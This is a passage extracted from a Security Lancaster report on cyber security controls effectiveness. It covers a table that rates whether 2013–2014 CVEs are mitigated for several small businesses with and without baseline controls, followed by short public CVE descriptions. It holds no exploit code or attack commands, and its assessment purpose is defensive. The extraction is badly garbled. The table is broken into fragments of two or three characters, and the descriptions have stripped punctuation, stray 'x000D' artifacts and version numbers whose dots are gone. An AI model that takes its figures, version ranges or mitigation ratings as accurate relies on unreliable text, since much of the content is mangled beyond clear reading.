ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
